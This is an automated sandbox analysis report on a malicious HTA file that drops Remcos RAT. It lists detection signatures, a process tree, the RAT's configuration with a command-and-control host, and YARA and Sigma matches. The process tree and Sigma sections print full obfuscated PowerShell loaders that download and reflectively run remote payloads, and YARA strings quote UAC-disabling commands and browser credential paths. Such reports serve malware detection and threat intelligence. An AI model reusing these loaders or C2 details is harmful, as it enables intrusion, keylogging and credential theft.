Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
seethebestthignswhichgivingbestopportunities.hta

Overview

General Information

Sample name:seethebestthignswhichgivingbestopportunities.hta
Analysis ID:1559566
MD5:35b8d63ead2eb58b7ed815be7bcbf97f
SHA1:88ae189165c612cc11e3a83ce322363698e21daf
SHA256:886699a7b1f864a18f767b1f3c95d860bced175c6e9bf2a5186119b698b5de23
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 2816 cmdline: mshta.exe "C:\Users\user\Desktop\seethebestthignswhichgivingbestopportunities.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7040 cmdline: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 7388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 7552 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 7604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • CasPol.exe (PID: 8052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["banaya.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VCYBO3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
seethebestthignswhichgivingbestopportunities.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6b6f8:$a1: Remcos restarted by watchdog!
            • 0x6bc70:$a3: %02i:%02i:%02i:%03i
            00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
            • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
            • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x65a04:$str_b2: Executing file:
            • 0x6683c:$str_b3: GetDirectListeningPort
            • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x66380:$str_b7: \update.vbs
            • 0x65a2c:$str_b9: Downloaded file:
            • 0x65a18:$str_b10: Downloading file:
            • 0x65abc:$str_b12: Failed to upload file:
            • 0x66804:$str_b13: StartForward
            • 0x66824:$str_b14: StopForward
            • 0x662d8:$str_b15: fso.DeleteFile "
            • 0x6626c:$str_b16: On Error Resume Next
            • 0x66308:$str_b17: fso.DeleteFolder "
            • 0x65aac:$str_b18: Uploaded file:
            • 0x65a6c:$str_b19: Unable to delete:
            • 0x662a0:$str_b20: while fso.FileExists("
            • 0x65f49:$str_c0: [Firefox StoredLogins not found]
            Click to see the 24 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            16.2.powershell.exe.93565d0.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              16.2.powershell.exe.93565d0.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                16.2.powershell.exe.93565d0.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  16.2.powershell.exe.93565d0.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6aaf8:$a1: Remcos restarted by watchdog!
                  • 0x6b070:$a3: %02i:%02i:%02i:%03i
                  16.2.powershell.exe.93565d0.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x64e04:$str_b2: Executing file:
                  • 0x65c3c:$str_b3: GetDirectListeningPort
                  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x65780:$str_b7: \update.vbs
                  • 0x64e2c:$str_b9: Downloaded file:
                  • 0x64e18:$str_b10: Downloading file:
                  • 0x64ebc:$str_b12: Failed to upload file:
                  • 0x65c04:$str_b13: StartForward
                  • 0x65c24:$str_b14: StopForward
                  • 0x656d8:$str_b15: fso.DeleteFile "
                  • 0x6566c:$str_b16: On Error Resume Next
                  • 0x65708:$str_b17: fso.DeleteFolder "
                  • 0x64eac:$str_b18: Uploaded file:
                  • 0x64e6c:$str_b19: Unable to delete:
                  • 0x656a0:$str_b20: while fso.FileExists("
                  • 0x65349:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 19 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi32_7724.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydw
                    Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( 